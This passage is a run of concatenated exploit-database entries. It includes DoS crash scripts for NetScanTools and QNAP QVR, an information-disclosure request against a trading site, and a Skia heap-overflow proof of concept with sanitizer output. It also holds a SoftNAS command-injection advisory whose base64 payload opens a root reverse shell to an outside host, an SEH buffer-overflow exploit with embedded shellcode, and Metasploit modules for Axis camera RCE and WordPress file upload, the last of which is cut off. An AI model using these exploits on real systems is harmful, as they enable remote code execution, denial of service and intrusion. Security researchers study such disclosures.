# 1.- Run python code : python NetScanTools_Basic_Edition_2.5.py
# 2.- Open NetScanTools_Basic_Edition_2.5.txt and copy content to clipboard
# 3.- Open NstBasic.exe
# 4.- Ping and Traceroute Tools
# 5.- Ping
# 6.- Paste ClipBoard on Target Hostname or IPv4 Address
# 7.- Do Ping
# 8.- Crashed
#!/usr/bin/env python
buffer = "\x41" * 1125
f = open ("NetScanTools_Basic_Edition_2.5.txt", "w")
f.write(buffer)
f.close()
# Exploit Title: Online Trade 1 - Information Disclosure
# Exploit Author: Dhamotharan
# Date: 2018-07-17
# Vendor Homepage: https://codecanyon.net/item/online-trade-online-forex-and-cryptocurrency-investment-system/21987193?s_rank=14
# CVE : CVE-2018-14328
# Version: 1
# Tested on: Kali Linux
# Description :
# Brynamics "Online Trade - Online trading and cryptocurrency investment
# system" allows remote attackers to obtain sensitive information via a
# direct request for /dashboard/addplan, /dashboard/paywithcard/charge,
# /dashboard/withdrawal, or /privacy&terms,
# as demonstrated by reading database username, database password,
# database_name, and IP address.
# POC:
# Request:
POST /dashboard/withdrawal HTTP/1.1
Host: 127.0.0.1:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64;
Trident/5.0)
Connection: close
Referer: http://127.0.0.1:8080/dashboard/withdrawals
Content-Type: application/x-www-form-urlencoded
Content-Length: 112
Cookie:
XSRF-TOKEN=eyJpdiI6IlAwSjE2SjE1REVUdTM0bXhsMDY1b3c9PSIsInZhbHVlIjoiN204
d3RFcmdOSFVmTEo2cGh5bFlxY3RlR0p2U2hoN3NkNDZ5Vit3MjdpS3B2RHJG
aVFZdzlKNmFyN25RbWJLRnZtT3FaTDVvbHV4Ym9HMmFiWlhGY0E9PSIsIm1h
YyI6ImZmNTFhOGJkMmYxMTBlMGRjZDU4YzQ5MTI3NTljN2JiOGYyODc3MTEx
YjhjMzFiZTNkNWMzZjc5YjVlYTUyODEifQ%3D%3D;
laravel_session=eyJpdiI6IjZycklXVDNRTWsrT0NsZ3A2ZnIrWFE9PSIsInZhbHVlIjoiRzdC
VlJzXC81VWdSWHlkSys2K3dtR2h3UnpzZzhjT1wvdDZtZ3BOMXpjU09SMTJD
TGdXeEhSWkhadGt0RnhPRDR3MWZreXlLOTA1RDNIQStIZFpxRG5OZz09Iiwi
bWFjIjoiNTkwYzU3ZGMxOTg3NWU1ZWFjNjVjNjNkN2VjODkzYTBjZDI3MTAx
NWJmZTUzN2VhZDRlNzEyMDcyODk5ZmFlZiJ9;
__tawkuuid=e::trade.brynamics.xyz::3PC5vtdJoz40C7aJUDGFFuGkOrICf1
3gr5+ReA6AWqfUvhPDsTAf982UcNP+u5nq::2;
TawkConnectionTime=0
amount=555-555-0199@example.com
&payment_mode=Bitcoin&method_id=2&_token=
VG4OwJ1Dxx0kDSA3JCp0JtHDMX3TI5WpXE6nTDWi
# Response:
HTTP/1.1 500 Internal Server Error
Date: Mon, 16 Jul 2018 11:14:58 GMT
Server: Apache
X-Powered-By: PHP/7.0.30
Cache-Control: no-cache, private
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 708733
<!DOCTYPE html><!--
Illuminate\Database\QueryException: SQLSTATE[22001]: String data, right
truncated: 1406 Data too long for column 'amount' at row
1 (SQL:
insert into `withdrawals` (`amount`, `to_deduct`, `payment_mode`, `status`,
`user`, `updated_at`, `created_at`) values (555-555-0199@example.com,
620.5, Bitcoin, Pending, 182, 2018-07-16 11:14:59, 2018-07-16 11:14:59)) in
# Exploit Title: QNap QVR Client 5.1.1.30070 - 'Password' Denial of Service (PoC)
# Discovery by: Luis Martínez
# Discovery Date: 2018-07-26
# Vendor Homepage: https://www.qnapsecurity.com/n/en/
# Software Link : http://download.qnap.com/Surveillance/QVRClient/Qmon_5.1.1.30070.zip
# Tested Version: 5.1.1.30070
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 Pro x64 es
# Steps to Produce the Crash:
# 1.- Run python code : python QNap_QVR_Client_5.1.1.30070.py
# 2.- Open QNap_QVR_Client_5.1.1.30070.txt and copy content to clipboard
# 3.- Open QVR.exe
# 4.- Direccion IP/Puerto -> 10.10.10.1 / 80
# 5.- Username -> admin
# 6.- Paste ClipBoard on Password
# 7.- OK
# 8.- Crashed
#!/usr/bin/env python
buffer = "\x41" * 279
f = open ("QNap_QVR_Client_5.1.1.30070.txt", "w")
f.write(buffer)
f.close()
There is a heap overflow in Skia when drawing paths with antialiasing turned off. This issue can be triggered in both Google Chrom and Mozilla Firefox by rendering a specially crafted SVG image. PoCs for both browsers are attached.
Details:
When Skia fills a path with antialiasing turned off, SkScan::FillPath gets called
https://cs.chromium.org/chromium/src/third_party/skia/src/core/SkScan_Path.cpp?rcl=3708f024b1118a73f0e6b3080234311c6647663b&l=609
SkScan::FillPath first checks that the path fits in the current drawing area (Clip). This happens in
https://cs.chromium.org/chromium/src/third_party/skia/src/core/SkScan_Path.cpp?rcl=3708f024b1118a73f0e6b3080234311c6647663b&l=645
If the clipping test passes at this point, then no other clipping checks will be performed when drawing this path. However, due to precision errors, it is possible that the drawing algorith is going to end up drawing outside of the current drawing area, which results in a heap overflow.
In this case, the precision errors happens when drawing cubic splines. In SkCubicEdge::setCubicWithoutUpdate, various factors needed to draw the spline are calculated. For example, on this line
https://cs.chromium.org/chromium/src/third_party/skia/src/core/SkEdge.cpp?rcl=5eb8fc585e9b3c9ccc82b0921986e1020ddaff23&l=430
when calculating fCDx, some precision will be lost because C and D end up being shifted to the right. Because of that, it is possible that the fCDx value is going to end up smaller than it should be.
The (too small) value of fCDx then gets added to the X coordinate here
https://cs.chromium.org/chromium/src/third_party/skia/src/core/SkEdge.cpp?rcl=5eb8fc585e9b3c9ccc82b0921986e1020ddaff23&l=471
it then gets propagated here
https://cs.chromium.org/chromium/src/third_party/skia/src/core/SkEdge.cpp?rcl=5eb8fc585e9b3c9ccc82b0921986e1020ddaff23&l=492
and here
https://cs.chromium.org/chromium/src/third_party/skia/src/core/SkEdge.cpp?g=0&rcl=5eb8fc585e9b3c9ccc82b0921986e1020ddaff23&l=116
where fX ends up being -2**15 (this corresponds to -0.5 in SkFixed type) and fDX ends up negative. When a spline (now approximated as a line segment) gets drawn in walk_convex_edges or walk_edges, fDX gets added to fX
https://cs.chromium.org/chromium/src/third_party/skia/src/core/SkScan_Path.cpp?rcl=3708f024b1118a73f0e6b3080234311c6647663b&l=267
then the resulting value gets rounded
https://cs.chromium.org/chromium/src/third_party/skia/src/core/SkScan_Path.cpp?rcl=3708f024b1118a73f0e6b3080234311c6647663b&l=249
and becomes -1, which leads to an out-of-bounds write.
Example Skia program that demonstrates the issue:
Note: it should be built with ASan enabled.
=================================================
#include "SkCanvas.h"
#include "SkPath.h"
#include "SkBitmap.h"
#include "SkGradientShader.h"
int main (int argc, char * const argv[]) {
int width = 100;
int height = 100;
SkBitmap bitmap;
bitmap.allocN32Pixels(width, height);
SkCanvas bitmapcanvas(bitmap);
SkCanvas *canvas = &bitmapcanvas;
SkPaint p;
p.setAntiAlias(false);
p.setStyle(SkPaint::kFill_Style);
SkColor colors[2] = {SkColorSetARGB(10,0,0,0), SkColorSetARGB(10,255,255,255)};
SkPoint points[2] = {
SkPoint::Make(0.0f, 0.0f),
SkPoint::Make(256.0f, 256.0f)
};
p.setShader(SkGradientShader::MakeLinear(
points, colors, nullptr, 2,
SkShader::kClamp_TileMode, 0, nullptr));
SkPath path;
path.moveTo(-30/64.0, -31/64.0);
path.cubicTo(-31/64.0, -31/64,-31/64.0, -31/64,-31/64.0, 100);
path.lineTo(100,100);
path.lineTo(100,-31/64.0);
canvas->drawPath(path, p);
return 0;
}
=================================================
Running this results in the following UBSan error:
../../include/core/SkPixmap.h:386:83: runtime error: left shift of negative value -1
SUMMARY: AddressSanitizer: undefined-behavior ../../include/core/SkPixmap.h:386:83 in
If the program is compiled without undefined-behavior checks, then running it generates the following ASan report
=================================================================
==18863==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6140000021d0 at pc 0x0000018df91a bp 0x7ffcdc7708d0 sp 0x7ffcdc7708c8
WRITE of size 4 at 0x6140000021d0 thread T0
#0 0x18df919 in (anonymous namespace)::DstTraits<unsigned int, ((anonymous namespace)::ApplyPremul)0>::store((anonymous namespace)::SkNx<4, float> const&, unsigned int*, (anonymous namespace)::SkNx<4, float> const&) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/shaders/gradients/Sk4fGradientPriv.h:73:18
#1 0x18df919 in void (anonymous namespace)::ramp<unsigned int, ((anonymous namespace)::ApplyPremul)0>((anonymous namespace)::SkNx<4, float> const&, (anonymous namespace)::SkNx<4, float> const&, unsigned int*, int, (anonymous namespace)::SkNx<4, float> const&, (anonymous namespace)::SkNx<4, float> const&) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/shaders/gradients/Sk4fLinearGradient.cpp:45
#2 0x18d3eb1 in void SkLinearGradient::LinearGradient4fContext::shadeSpanInternal<unsigned int, ((anonymous namespace)::ApplyPremul)0, (SkShader::TileMode)0>(int, int, unsigned int*, int, float, float) const /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/shaders/gradients/Sk4fLinearGradient.cpp:256:13
#3 0x18d3eb1 in void SkLinearGradient::LinearGradient4fContext::shadePremulSpan<unsigned int, ((anonymous namespace)::ApplyPremul)0>(int, int, unsigned int*, int, float, float) const /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/shaders/gradients/Sk4fLinearGradient.cpp:209
#4 0x18d3eb1 in SkLinearGradient::LinearGradient4fContext::shadeSpan(int, int, unsigned int*, int) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/shaders/gradients/Sk4fLinearGradient.cpp:181
#5 0x167213d in SkARGB32_Shader_Blitter::blitH(int, int, int) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkBlitter_ARGB32.cpp:377:25
#6 0xd1cf47 in walk_convex_edges(SkEdge*, SkPath::FillType, SkBlitter*, int, int, void (*)(SkBlitter*, int, bool)) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkScan_Path.cpp:261:30
#7 0xd1b364 in sk_fill_path(SkPath const&, SkIRect const&, SkBlitter*, int, int, int, bool) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkScan_Path.cpp:471:9
#8 0xd1e625 in SkScan::FillPath(SkPath const&, SkRegion const&, SkBlitter*) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkScan_Path.cpp:656:9
#9 0xd0c39a in SkScan::FillPath(SkPath const&, SkRasterClip const&, SkBlitter*) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkScan_AntiPath.cpp:827:9
#10 0xb9ae3d in SkDraw::drawDevPath(SkPath const&, SkPaint const&, bool, SkBlitter*, bool, SkInitOnceData*) const /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkDraw.cpp:1024:9
#11 0xb9c046 in SkDraw::drawPath(SkPath const&, SkPaint const&, SkMatrix const*, bool, bool, SkBlitter*, SkInitOnceData*) const /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkDraw.cpp:1141:11
#12 0x164e60a in SkDraw::drawPath(SkPath const&, SkPaint const&, SkMatrix const*, bool) const /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkDraw.h:58:15
#13 0x164e60a in SkBitmapDevice::drawPath(SkPath const&, SkPaint const&, SkMatrix const*, bool) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkBitmapDevice.cpp:411
#14 0xb44c54 in SkCanvas::onDrawPath(SkPath const&, SkPaint const&) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkCanvas.cpp:2145:23
#15 0xb3bf59 in SkCanvas::drawPath(SkPath const&, SkPaint const&) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkCanvas.cpp:1708:11
#16 0x86021e in main /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../example/SkiaSDLExample.cpp:37:11
#17 0x7fd0eb3672b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)
#18 0x770659 in _start (/usr/local/google/home/ifratric/p0/skia/skia/out/asan/SkiaSDLExample+0x770659)
0x6140000021d0 is located 0 bytes to the right of 400-byte region [0x614000002040,0x6140000021d0)
allocated by thread T0 here:
#0 0x825b20 in __interceptor_malloc (/usr/local/google/home/ifratric/p0/skia/skia/out/asan/SkiaSDLExample+0x825b20)
#1 0xdf1d74 in sk_malloc_flags(unsigned long, unsigned int) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/ports/SkMemory_malloc.cpp:69:13
#2 0x1671202 in sk_malloc_throw(unsigned long) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../include/private/SkMalloc.h:59:12
#3 0x1671202 in SkARGB32_Shader_Blitter::SkARGB32_Shader_Blitter(SkPixmap const&, SkPaint const&, SkShaderBase::Context*) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkBlitter_ARGB32.cpp:336
#4 0x16643f9 in SkARGB32_Shader_Blitter* SkArenaAlloc::make<SkARGB32_Shader_Blitter, SkPixmap const&, SkPaint const&, SkShaderBase::Context*&>(SkPixmap const&, SkPaint const&, SkShaderBase::Context*&) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkArenaAlloc.h:103:30
#5 0x1663681 in SkBlitter::Choose(SkPixmap const&, SkMatrix const&, SkPaint const&, SkArenaAlloc*, bool) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkBlitter.cpp:1119:34
#6 0xb9b4fe in SkAutoBlitterChoose::choose(SkDraw const&, SkMatrix const*, SkPaint const&, bool) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkAutoBlitterChoose.h:36:20
#7 0xb9aa59 in SkDraw::drawDevPath(SkPath const&, SkPaint const&, bool, SkBlitter*, bool, SkInitOnceData*) const /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkDraw.cpp:966:34
#8 0xb9c046 in SkDraw::drawPath(SkPath const&, SkPaint const&, SkMatrix const*, bool, bool, SkBlitter*, SkInitOnceData*) const /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkDraw.cpp:1141:11
#9 0x164e60a in SkDraw::drawPath(SkPath const&, SkPaint const&, SkMatrix const*, bool) const /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkDraw.h:58:15
#10 0x164e60a in SkBitmapDevice::drawPath(SkPath const&, SkPaint const&, SkMatrix const*, bool) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkBitmapDevice.cpp:411
#11 0xb44c54 in SkCanvas::onDrawPath(SkPath const&, SkPaint const&) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkCanvas.cpp:2145:23
#12 0xb3bf59 in SkCanvas::drawPath(SkPath const&, SkPaint const&) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkCanvas.cpp:1708:11
#13 0x86021e in main /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../example/SkiaSDLExample.cpp:37:11
#14 0x7fd0eb3672b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)
SUMMARY: AddressSanitizer: heap-buffer-overflow /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/shaders/gradients/Sk4fGradientPriv.h:73:18 in (anonymous namespace)::DstTraits<unsigned int, ((anonymous namespace)::ApplyPremul)0>::store((anonymous namespace)::SkNx<4, float> const&, unsigned int*, (anonymous namespace)::SkNx<4, float> const&)
Shadow bytes around the buggy address:
0x0c287fff83e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c287fff83f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c287fff8400: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
0x0c287fff8410: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c287fff8420: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c287fff8430: 00 00 00 00 00 00 00 00 00 00[fa]fa fa fa fa fa
0x0c287fff8440: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
0x0c287fff8450: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c287fff8460: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c287fff8470: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c287fff8480: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==18863==ABORTING
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/45098.zip
Core Security - Corelabs Advisory
http://corelabs.coresecurity.com/
SoftNAS Cloud OS Command Injection
1. *Advisory Information*
Title: SoftNAS Cloud OS Command Injection
Advisory ID: CORE-2018-0009
Advisory URL:
http://www.coresecurity.com/advisories/softnas-cloud-OS-command-injection
Date published: 2018-07-26
Date of last update: 2018-05-28
Vendors contacted: SoftNAS
Release mode: Coordinated release
2. *Vulnerability Information*
Class: Improper Neutralization of Special Elements used in an OS
Command [CWE-78]
Impact: Code execution
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2018-14417
3. *Vulnerability Description*
SoftNAS' website states that:
[1] SoftNAS Cloud is a software-defined NAS filer delivered as a virtual
storage appliance that runs within public, private or hybrid clouds.
SoftNAS Cloud provides enterprise-grade NAS capabilities, including
encryption, snapshots, rapid rollbacks, and cross-zone high-availability
with automatic failover.
A command injection vulnerability was found in the web administration
console. In particular, snserv script did not sanitize some input
parameters before executing a system command.
4. *Vulnerable Packages*
. SoftNAS Cloud versions prior to 4.0.3
Other products and versions might be affected, but they were not tested.
5. *Vendor Information, Solutions and Workarounds*
SoftNAS released SoftNAS Cloud 4.0.3 that addresses the reported
vulnerability. The software update can be performed via the
StorageCenter admin UI in the product.
For more information on the updating process see:
https://www.softnas.com/docs/softnas/v3/html/updating_to_the_latest_version.html.
In addition, SoftNAS published the following release note:
https://docs.softnas.com/display/SD/Release+Notes
6. *Credits*
The vulnerability was discovered and researched by Fernando Diaz and
Fernando Catoira from Core Security Consulting Services. The publication
of this advisory was coordinated by Leandro Cuozzo from Core Advisories
Team.
7. *Technical Description / Proof of Concept Code*
7.1. *Check and execute update functionality abuse leading to command
execution*
[CVE-2018-14417]
The 'recentVersion' parameter from the snserv endpoint is vulnerable to
OS Command Injection when check and execute update operations are
performed.
This endpoint has no authentication/session verification. Therefore, it
is possible for an unauthenticated attacker to execute malicious code in
the target server. As the WebServer runs a Sudoer user (apache), the
malicious code can be executed with root permissions.
The following part of the /etc/sudoers file shows the apache user
capabilities.
/-----
User_Alias APACHE = apache
# Once SoftNAS UI is operational, only allow the specific command that
require sudo access!!
Cmnd_Alias SOFTNAS = ALL
APACHE ALL = (ALL) NOPASSWD: SOFTNAS
-----/
The following proof of concept generates a remote shell on the target
system as root:
/-----
GET
/softnas/snserver/snserv.php?opcode=checkupdate&opcode=executeupdate&selectedupdate=3.6aaaaaaa.1aaaaaaaaaaaaaa&update_type=standard&recentVersions=3.6aaaaaaaaaaa.1aaaaaaa;echo+YmFzaCAtaSA%2bJiAvZGV2L3RjcC8xMC4yLjQ1LjE4NS8xMjM0NSAwPiYx+|+base64+-d+|+sudo+bash;
HTTP/1.1
Host: 10.2.45.208
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0)
Gecko/20100101 Firefox/59.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://10.2.45.208/softnas/applets/update/
X-Requested-With: XMLHttpRequest
Connection: close
-----/
As can be seen in the former request the payload had to be base64
encoded as some special characters were not being properly decoded.
8. *Report Timeline*
2018-05-29: Core Security sent an initial notification to SoftNAS,
including a draft advisory.
2018-05-31: SoftNAS confirmed the reported vulnerability and informed
they were working on a plan to fix the issue.
2018-05-31: Core Security thanked the SoftNAS' reply.
2018-06-15: Core Security requested a status update.
2018-06-26: SoftNAS answered saying the fixed version was scheduled for
late July.
2018-06-26: Core Security thanked the update.
2018-07-16: Core Security asked for a status update and requested a
solidified release date.
2018-07-16: SoftNAS informed that the new release version were under QA
verification and they would have the release date during the week.
2018-07-19: SoftNAS notified Core Security that SoftNAS Cloud 4.0.3
version was already available.
2018-07-19: Core Security thanked SoftNAS's update and set July 26th as
the publication date.
2018-07-26: Advisory CORE-2018-0009 published.
9. *References*
[1] https://www.softnas.com
10. *About CoreLabs*
CoreLabs, the research center of Core Security, is charged with
anticipating the future needs and requirements for information security
technologies. We conduct our research in several important areas of
computer security including system vulnerabilities, cyber attack
planning and simulation, source code auditing, and cryptography. Our
results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://corelabs.coresecurity.com.
11. *About Core Security*
Core Security provides companies with the security insight they need to
know who, how, and what is vulnerable in their organization. The
company's threat-aware, identity & access, network security, and
vulnerability management solutions provide actionable insight and
context needed to manage security risks across the enterprise. This
shared insight gives customers a comprehensive view of their security
posture to make better security remediation decisions. Better insight
allows organizations to prioritize their efforts to protect critical
assets, take action sooner to mitigate access risk, and react faster if
a breach does occur.
Core Security is headquartered in the USA with offices and operations in
South America, Europe, Middle East and Asia. To learn more, contact Core
Security at (678) 304-4500 or info@coresecurity.com
12. *Disclaimer*
The contents of this advisory are copyright (c) 2018 Core Security and
(c) 2018 CoreLabs, and are licensed under a Creative Commons Attribution
Non-Commercial Share-Alike 3.0 (United States) License:
http://creativecommons.org/licenses/by-nc-sa/3.0/us/
# Exploit Title: Allok MOV Converter 4.6.1217 - Buffer Overflow (SEH)
# Date: 2018-07-29
# Discovery by: Shubham Singh
# Known As: Spirited Wolf [Twitter: @Pwsecspirit]
# Software Link: http://www.alloksoft.com/allok_movconverter.exe
# Tested Version: 4.6.1217
# Tested on OS: Windows XP Service Pack 3 x86
# Greetz: @hexachordanu @FuzzySec @LiveOverflow
# Steps to Reproduce: Run the python exploit script, it will create a new
# file with the name "exploit.txt" just copy the text inside "exploit.txt"
# Start the Allok MOV Converter 4.6.1217 program and in the Lisence name paste the content of "exploit.txt" and click on Register.
# You will see a sweet calculator poped up.
file = open("exploit.txt","wb")
junk = "\x41" * 780
nseh = "\xeb\x10\x90\x90" #Short Jump address
seh = "\x79\x25\x01\x76" #0x76012579
nops = "\x90" * 16
#badchar \x00\x08\x09\x0a\x0b\x0c\x0d
#msfvenom -p windows/exec CMD=calc.exe -b '\x00\x08\x09\x0a\x0b\x0c\x0d' -f python
buf = ""
buf += "\xba\xbb\xf0\xaa\x11\xdd\xc3\xd9\x74\x24\xf4\x5e\x31"
buf += "\xc9\xb1\x31\x83\xee\xfc\x31\x56\x0f\x03\x56\xb4\x12"
buf += "\x5f\xed\x22\x50\xa0\x0e\xb2\x35\x28\xeb\x83\x75\x4e"
buf += "\x7f\xb3\x45\x04\x2d\x3f\x2d\x48\xc6\xb4\x43\x45\xe9"
buf += "\x7d\xe9\xb3\xc4\x7e\x42\x87\x47\xfc\x99\xd4\xa7\x3d"
buf += "\x52\x29\xa9\x7a\x8f\xc0\xfb\xd3\xdb\x77\xec\x50\x91"
buf += "\x4b\x87\x2a\x37\xcc\x74\xfa\x36\xfd\x2a\x71\x61\xdd"
buf += "\xcd\x56\x19\x54\xd6\xbb\x24\x2e\x6d\x0f\xd2\xb1\xa7"
buf += "\x5e\x1b\x1d\x86\x6f\xee\x5f\xce\x57\x11\x2a\x26\xa4"
buf += "\xac\x2d\xfd\xd7\x6a\xbb\xe6\x7f\xf8\x1b\xc3\x7e\x2d"
buf += "\xfd\x80\x8c\x9a\x89\xcf\x90\x1d\x5d\x64\xac\x96\x60"
buf += "\xab\x25\xec\x46\x6f\x6e\xb6\xe7\x36\xca\x19\x17\x28"
buf += "\xb5\xc6\xbd\x22\x5b\x12\xcc\x68\x31\xe5\x42\x17\x77"
buf += "\xe5\x5c\x18\x27\x8e\x6d\x93\xa8\xc9\x71\x76\x8d\x26"
buf += "\x38\xdb\xa7\xae\xe5\x89\xfa\xb2\x15\x64\x38\xcb\x95"
buf += "\x8d\xc0\x28\x85\xe7\xc5\x75\x01\x1b\xb7\xe6\xe4\x1b"
buf += "\x64\x06\x2d\x78\xeb\x94\xad\x51\x8e\x1c\x57\xae"
more = "\x41" * 100
exploit = junk + nseh + seh + nops + buf + more
file.write(exploit)
file.close()
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
#include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => 'Axis Network Camera .srv to parhand RCE',
'Description' => %q{
This module exploits an auth bypass in .srv functionality and a
command injection in parhand to execute code as the root user.
},
'Author' => [
'Or Peles', # Vulnerability discovery (VDOO)
'wvu', # Metasploit module
'sinn3r', # Metasploit module
'Brent Cook', # Metasploit module
'Jacob Robles', # Metasploit module
'Matthew Kienow', # Metasploit module
'Shelby Pace', # Metasploit module
'Chris Lee', # Metasploit module
'Cale Black' # Metasploit module
],
'References' => [
['CVE', '2018-10660'],
['CVE', '2018-10661'],
['CVE', '2018-10662'],
['URL', 'https://blog.vdoo.com/2018/06/18/vdoo-discovers-significant-vulnerabilities-in-axis-cameras/'],
['URL', 'https://www.axis.com/files/faq/Advisory_ACV-128401.pdf']
],
'DisclosureDate' => 'Jun 18 2018',
'License' => MSF_LICENSE,
'Platform' => ['unix'],# 'linux'],
'Arch' => [ARCH_CMD],# ARCH_ARMLE],
'Privileged' => true,
'Targets' => [
['Unix In-Memory',
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Type' => :unix_memory,
'Payload' => {
'BadChars' => ' ',
'Encoder' => 'cmd/ifs',
'Compat' => {'PayloadType' => 'cmd', 'RequiredCmd' => 'netcat-e'}
}
],
=begin
['Linux Dropper',
'Platform' => 'linux',
'Arch' => ARCH_ARMLE,
'Type' => :linux_dropper
]
=end
],
'DefaultTarget' => 0,
'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping'}
))
end
def exploit
case target['Type']
when :unix_memory
execute_command(payload.encoded)
=begin
when :linux_dropper
execute_cmdstager
=end
end
end
def execute_command(cmd, opts = {})
rand_srv = "#{Rex::Text.rand_text_alphanumeric(8..42)}.srv"
send_request_cgi(
'method' => 'POST',
'uri' => "/index.html/#{rand_srv}",
'vars_post' => {
'action' => 'dbus',
'args' => dbus_send(
method: :set_param,
param: "string:root.Time.DST.Enabled string:;#{cmd};"
)
}
)
send_request_cgi(
'method' => 'POST',
'uri' => "/index.html/#{rand_srv}",
'vars_post' => {
'action' => 'dbus',
'args' => dbus_send(method: :synch_params)
}
)
end
def dbus_send(method:, param: nil)
args = '--system --dest=com.axis.PolicyKitParhand ' \
'--type=method_call /com/axis/PolicyKitParhand '
args <<
case method
when :set_param
"com.axis.PolicyKitParhand.SetParameter #{param}"
when :synch_params
'com.axis.PolicyKitParhand.SynchParameters'
end
args
end
end
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HTTP::Wordpress
include Msf::Exploit::PhpEXE
def initialize(info={})
super(update_info(info,
'Name' => "WordPress Responsive Thumbnail Slider Arbitrary File Upload",
'Description' => %q{
This module exploits an arbitrary file upload vulnerability in Responsive Thumbnail Slider
Plugin v1.0 for WordPress post authentication.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Arash Khazaei', # EDB PoC
'Shelby Pace' # Metasploit Module
],
'References' =>
[
[ 'EDB', '37998' ]
],
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' =>
[
[ 'Responsive Thumbnail Slider Plugin v1.0', { } ]
],
'Privileged' => false,
'DisclosureDate' => "Aug 28 2015",
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI', [ true, "Base path for WordPress", '/' ]),
OptString.new('WPUSERNAME', [ true, "WordPress Username to authenticate with", 'admin' ]),
OptString.new('WPPASSWORD', [ true, "WordPress Password to authenticate with", '' ])
])
end
def check
# The version regex found in extract_and_check_version does not work for this plugin's
# readme.txt, so we build a custom one.
check_code = check_version || check_plugin_path
if check_code
return check_code
else
return CheckCode::Safe
end
end
def check_version
plugin_uri = normalize_uri(target_uri.path, '/wp-content/plugins/wp-responsive-thumbnail-slider/readme.txt')
res = send_request_cgi(
'method' => 'GET',
'uri' => plugin_uri
)
if res && res.body && res.body =~ /Version:([\d\.]+)/
version = Gem::Version.new($1)
if version <= Gem::Version.new('1.0')
vprint_status("Plugin version found: #{version}")
return CheckCode::Appears
end
end
nil
end
def check_plugin_path
plugin_uri = normalize_uri(target_uri.path, '/wp-content/uploads/wp-responsive-images-thumbnail-slider/')
res = send_request_cgi(
'method' => 'GET',
'uri' => plugin_uri
)
if res && res.code == 200
vprint_status('Upload folder for wp-responsive-images-thumbnail-slider detected')
